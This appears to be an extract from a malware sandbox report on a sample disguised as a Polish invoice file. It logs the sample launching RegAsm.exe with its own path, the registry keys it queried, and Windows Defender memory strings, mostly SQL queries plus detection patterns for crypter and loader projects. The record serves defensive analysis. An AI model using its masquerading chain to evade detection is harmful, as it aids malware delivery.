Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: C:\\.+\\www.microfost.com -3.vbp
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	Binary or memory string: ,'.+:\\afron\\Loader.*VB.+\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	Binary or memory string: .+\\Cyborg-Crypt-Source\\634z7\\Projekt1\.vbp
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	Binary or memory string: `@*\AC:\PiElcestial-udtools-net-indetectables.vbp

Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe 'C:\Users\user\Desktop\FAKTURA I PARAGONY.exe'
Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\FAKTURA I PARAGONY.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\oobe\UserOOBEBroker.exe C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
Source: unknown	Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe 'C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-51041e98.exe' /q WD
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe	Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe /stub 1.1.18500.10 /payload 1.351.265.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-51041e98.exe /q WD
Source: unknown	Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe uninstall-manifest C:\Windows\TEMP\03B8EEFF-063F-7FBE-74AE-B9DD32097DDC.man
Source: C:\Windows\System32\wevtutil.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\03B8EEFF-063F-7FBE-74AE-B9DD32097DDC.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'
Source: C:\Windows\System32\wevtutil.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\FAKTURA I PARAGONY.exe'
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe	Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe /stub 1.1.18500.10 /payload 1.351.265.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-51041e98.exe /q WD

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Source: MpSigStub.exe, 00000023.00000003.6245821997.0000028BC8334000.00000004.00000001.sdmp	Binary or memory string: UPDATE AtomicCounters SET Name = ?, Count = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.6243259523.0000028BC815A000.00000004.00000001.sdmp	Binary or memory string: SELECT 1 FROM SQLITE_MASTER WHERE type=? AND name=? LIMIT 1;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO FileLowFiAsync(Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp) VALUES(?, ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM ProcessBlockHistory WHERE ProcessPath = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO AnomalyInfo(Key, UnbiasedTime) VALUES (?, ?);
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(13, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM AutoFeatureControl;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT DISTINCT TableName FROM AnomalyTables;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM FileHashes WHERE FileHashes.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.6245821997.0000028BC8334000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO RollingQueuesTables(Key, Name, Capacity, TimeToLive, Mode) VALUES(? , ? , ? , ? , ?); DELETE FROM RollingQueuesTables WHERE RollingQueuesTables.Key = ?; DELETE FROM RollingQueuesTables WHERE (Name NOT IN (SELECT DISTINCT EntryTable FROM RollingQueuesValues)); SELECT Key, Name, Capacity, TimeToLive, Mode FROM RollingQueuesTables WHERE Key = ?; SELECT Key FROM RollingQueuesTables WHERE RollingQueuesTables.Key = ?; SELECT EntryTable, EntryKey, EntryValue, InsertTime, ExpireTime FROM RollingQueuesValues WHERE EntryTable = ?; INSERT INTO RollingQueuesValues(EntryTable, EntryKey, EntryValue, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?); DELETE FROM RollingQueuesValues WHERE ExpireTime < ?; DELETE FROM RollingQueuesTables; DELETE FROM RollingQueuesValues; SELECT COUNT(1) FROM RollingQueuesValues; Failed to fetch row from prepared statement.Failed to get column from prepared statement.Failed to bind value to prepared statement.
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM RansomwareDetections;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM NetworkIpFirewallRules;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO RollingQueuesValues(EntryTable, EntryKey, EntryValue, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, Name, Count, InsertTime, ExpireTime, UpdateTime FROM AtomicCounters WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n FROM FileHashes WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.6245821997.0000028BC8334000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO AutoFeatureControl(Key, CurrCount, MaxCount, InstanceTimeStamp) VALUES (?, ?, ?, ?);DELETE FROM AutoFeatureControl;DELETE FROM AutoFeatureControl WHERE InstanceTimeStamp < ?; SELECT ID FROM AutoFeatureControl WHERE AutoFeatureControl.Key = ?;SELECT Key, CurrCount, MaxCount, InstanceTimeStamp FROM AutoFeatureControl WHERE Key = ?DELETE FROM AutoFeatureControl WHERE AutoFeatureControl.Key = ?;SELECT Count(1) FROM AutoFeatureControl;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM FileLowFiAsync;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID from RecordIdentifier WHERE Key = ? AND RecordTimeStamp = ? ;
Source: MpSigStub.exe, 00000023.00000003.6245821997.0000028BC8334000.00000004.00000001.sdmp	Binary or memory string: SELECT FilePath, FirstStartTime, NextUSN, AutomaticRemovalPolicy, ImpactedCBPNameSpaces FROM BackupProcessInfo WHERE Key = ?;SELECT Count(1) FROM BackupProcessInfo;SELECT ID FROM BackupProcessInfo WHERE Key = ?;INSERT INTO BackupProcessInfo(Key, FilePath, FirstStartTime, NextUSN, AutomaticRemovalPolicy, ImpactedCBPNameSpaces, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?);DELETE FROM BackupProcessInfo WHERE Key = ?;DELETE FROM BackupProcessInfo WHERE InstanceTimeStamp < ?; ^;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM SystemFileCache WHERE CleanFileShaHash = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(14, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(6, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.6245821997.0000028BC8334000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO FolderGuardPaths(UserIdHash, UserId, GUID, Path) VALUES ( ?, ?, ?, ? );SELECT ID FROM FolderGuardPaths WHERE UserIdHash = ? LIMIT 1;SELECT UserId, GUID, Path FROM FolderGuardPaths WHERE UserIdHash = ?SELECT Count(DISTINCT UserIdHash) FROM FolderGuardPaths;DELETE FROM FolderGuardPaths WHERE UserIdHash = ?;N
Source: MpSigStub.exe, 00000023.00000003.6243259523.0000028BC815A000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ? ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE RuleId = ? ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(4, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, Name, Capacity, TimeToLive, Mode FROM RollingQueuesTables WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO BmFileStartupActions(FilePathHash, FilePath, ActionFlags, ProcessStartCount, FdrFlags, FdrThreatRecordId, EvaluatorThreatRecordId, TrustedInstallerThreatRecordId, LFRThreatRecordId) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO BmFileActions(FileInfoId, ThreatRecordId, Action) VALUES (?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(5, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM FolderGuardPaths WHERE UserIdHash = ? LIMIT 1;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO RansomwareDetections(Key, DetectionGuid, LkgTS, NextUSN, DetectionTS, ProvisionalRemedComplTS, RemedComplTS, ImpactedCBPNameSpaces, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(12, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT CleanFileSha, CleanFileShaHash FROM SystemFileCache WHERE InstanceTimeStamp < ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT PersistId, PersistIdBlob, ExpirationDate FROM AmsiFileCache WHERE ExpirationDate < DateTime(?);
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO DynSigRevisions(Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, RecordTimeStamp, Generation FROM RecordIdentifier WHERE RecordIdentifier.ID IN (SELECT FileInstance.RecordID from FileInstance WHERE FileInstance.ParentRecordID = ? );
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT RuleAction, RuleId, IsAudit, IsInherited, State FROM BmHipsRuleInfo WHERE ProcessInfoId = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, FirewallRuleName, ExpiryTime FROM NetworkIpFirewallRules WHERE ExpiryTime < ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM SystemFileCache;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC LIMIT 1;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO BmFileInfo(NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM SdnEx;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(3, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO FileInstance(InstanceTimeStamp, RecordID, ScanID, TrackingEnabled, StorageEvent, StorageEventState, ModificationsCount, ParentRecordID, Parent_FileEvent, Parent_FileName, Parent_ProcessID, Remote_ProcessID, FileID, FileName, USN, CreateTime, LastAccessTime, LastWriteTime, Signer, SignerHash, Issuer, SigningTime, MOTW, MOTWFromParent,IsValidCert, CertInvalidDetails, IsCatalogSigned) VALUES(?, ? , ?, ?, ?, ? , ? , ? , ? , ? , ?, ?, ?, ?, ?, ? , ? , ? , ? , ? , ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT EntryTable, EntryKey, EntryValue, InsertTime, ExpireTime FROM RollingQueuesValues WHERE EntryTable = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Version, Current, LastUpdated FROM SQLiteGlobals WHERE Current = 1 ORDER BY Version DESC ;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM AmsiFileCache WHERE AmsiFileCache.PersistId = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO AttributeCounts(Key, Name, Count, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(28, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO AttributePersistContext(Key, FilePath, Context, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID from File WHERE SHA1 = ? ;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO ScanInfo(SigSeq, PersistSigSeq, ProgenitorPersistSigSeq, ScanAgent, NamedAttributes, PeAttributes, SigAttrEvents, ScanReason, WebURL, EngineID, SigSha) VALUES(? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? );
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(DISTINCT ProcessPath) FROM ProcessBlockHistory;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM Engine WHERE EngineVersion = ? AND SigVersion = ? ;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO AmsiFileCache(PersistId, PersistIdBlob, ExpirationDate) VALUES (?, ?, DateTime('now', ?));
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM AttributePersistContext;
Source: MpSigStub.exe, 00000023.00000003.6245821997.0000028BC8334000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM SdnEx WHERE SdnEx.Key = ?;SELECT Key, CurrentCount FROM SdnEx WHERE Key = ?DELETE FROM SdnEx WHERE SdnEx.Key = ?;SELECT Count(1) FROM SdnEx;INSERT INTO SdnEx(Key, CurrentCount) VALUES (?, ?);DELETE FROM SdnEx;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM SystemRegistryCache;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(24, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID, NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(11, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(31, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO DynSigRevisions(Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);SELECT Count(1) FROM DynSigRevisions;DELETE FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;SELECT Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision FROM DynSigRevisions WHERE Key = ?SELECT ID FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT InfectedFileSHA, ProcFileId, SystemFilePath, CleanFileSha FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ? ORDER BY InstanceTimeStamp DESC;
Source: MpSigStub.exe, 00000023.00000003.6227003671.0000028BC70EC000.00000004.00000001.sdmp	Binary or memory string: SELECT 1 FROM SQLITE_MASTER WHERE type=? AND name=? LIMIT 1;Engine.MetaStore.DBVaultUtilizationMpDisableTaskSchedCmdLineScanMb=Lk
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM AutoFeatureControl WHERE AutoFeatureControl.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO AnomalyTables(Key, TableKey, TableName, KeyName, FirstSeen, LastSeen, UnbiasedMinutes, Value, Order_) VALUES(? , ? , ? , ? , ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SystemFileCache(InfectedFileSHAHash, InfectedFileSHA, ProcFileIDSystemFileHash, ProcFileId, SystemFilePath, CleanFileSha, CleanFileShaHash, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(16, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(8, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(26, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, TableKey, TableName, KeyName, FirstSeen, LastSeen, UnbiasedMinutes, Value, Order_ FROM AnomalyTables WHERE AnomalyTables.TableKey = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM AnomalyTables;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM FileLowFiAsync WHERE FileLowFiAsync.Key = ?; SELECT Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp FROM FileLowFiAsync WHERE Key = ?; SELECT COUNT(1) FROM FileLowFiAsync; DELETE FROM FileLowFiAsync WHERE FileLowFiAsync.Key = ?; DELETE FROM FileLowFiAsync WHERE InstanceTimeStamp < ?; INSERT INTO FileLowFiAsync(Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp) VALUES(?, ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000023.00000003.6245821997.0000028BC8334000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM FileHashes; DELETE FROM FileHashes WHERE FileHashes.Key = ?; DELETE FROM FileHashes WHERE InstanceTimeStamp < ?; INSERT INTO FileHashes(Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n) VALUES(?, ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ?);SELECT Key FROM FileHashes WHERE FileHashes.Key = ?; SELECT Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n FROM FileHashes WHERE Key = ?; SELECT Key FROM FileHashes ORDER BY InstanceTimeStamp ASC LIMIT 1
Source: MpSigStub.exe, 00000023.00000003.6245821997.0000028BC8334000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(30, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(DISTINCT UserIdHash) FROM FolderGuardPaths;
